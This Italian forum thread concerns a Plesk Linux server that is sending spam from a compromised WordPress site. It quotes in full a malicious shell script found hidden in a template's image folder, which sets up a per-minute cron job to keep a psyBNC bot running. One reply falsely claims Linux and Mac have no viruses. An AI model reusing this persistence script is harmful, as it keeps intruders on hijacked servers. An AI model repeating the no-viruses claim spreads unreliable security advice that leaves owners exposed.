• User Attivo

    problema virus nel server linux

    ciao a tutti da qualche giorno dal mio server linux (con pannello plesk) partono un sacco di email, ho chiesto al mio sistemista da cosa potrebbe essere causato il problema e mi ha detto che il problema e causato da un sito presente sul mio server che e infetto di virus ed ha uno script malevolo, questo perchè su questo sito è stato installato un template wordpress che aveva gia di suo questi virus, adesso mi ha detto il sistemista che a causa di questo sito è stato infettato tutto il server, quello che mi chiedo, e possibile? anche perche il proprietario del sito infetto non ha accesso al server come super amministratore, come può un sito appoggiato sul mio server, infettare tutto il sistema?


  • Super User

    Ciao, spero che tu abbia solamente riportato male quello che ti ha detto il tuo sistemista, perché su Linux non esistono i virus. Neppure su Mac che è un altro sistema Unix.

    Se invece il tuo sistemista ha parlato di virus allora forse è meglio che cambi.

    M.


  • Moderatore

    Andrebbe fatta un'analisi approfondita. Quello che dice il tuo sistemista è possibile ma assai remoto. Partire di uno script php malevolo e arrivare ad un server con un rootkit installato è decisamente rocambolesco. Piuttosto avete individuato lo script malevolo? E' stato rimosso? E' stata fatta un'analisi con rkhunter e similari?

    Intanto puoi fare ( o lo fai fare al sistemista ) un controllo per vedere quali processi sono coinvolti nell'invio delle email. E siete sicuri che le email partano da quel server? Spesso i cybercriminali usano indirizzi email forgiati che rimandano a soggetti estranei. Non so cosa avete scoperto e quali dati avete in mano, ma le possibilità possono essere parecchie.


  • User Attivo

    mi ha detto il sistemista che ha già fatto una scansione con qualcosa di simile a rkhunter ma il problema non era individuabile tramite queto genere di applicazioni, mi ha fatto vedere anche il percorso dello script malevolo che si trova in questo percorso: /var/www/vhosts/svaporium.com/httpdocs/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/3 ad esempio uno dei file presenti in questo percorso si chiama fuck e contiene questo codice

    #!/bin/sh
    pwd > ssstt.dir
    dir=$(cat ssstt.dir)
    echo "* * * * * $dir/y2kupdate >/dev/null 2>&1" > cron.d
    crontab cron.d
    crontab -l | grep y2kupdate
    echo "#!/bin/sh
    if test -r $dir/psybnc.pid; then
    pid=$(cat $dir/psybnc.pid)
    if $(kill -CHLD $pid >/dev/null 2>&1)
    then
    exit 0
    fi
    fi
    cd $dir
    ./run &>/dev/null" > y2kupdate
    chmod u+x y2kupdate


  • Moderatore

    E' un malware noto e si tratta di un bot. L'unica cosa da fare è procedere a scovarlo ed eliminarlo, altrimenti puoi fare una formattazione se provi non si riesce in tempi ragionevoli a ripristinare il sistema.

    Ovviamente se hai a disposizione immagini di backup il problema si risolve ancora più facilmente.


  • User Attivo

    vi ringrazio, credo che il sistemista sa già dove mettere le mani, mi sembra sicuro di se, dubitavo della sua bravura dato che si tratta di un ragazzino di 16 anni.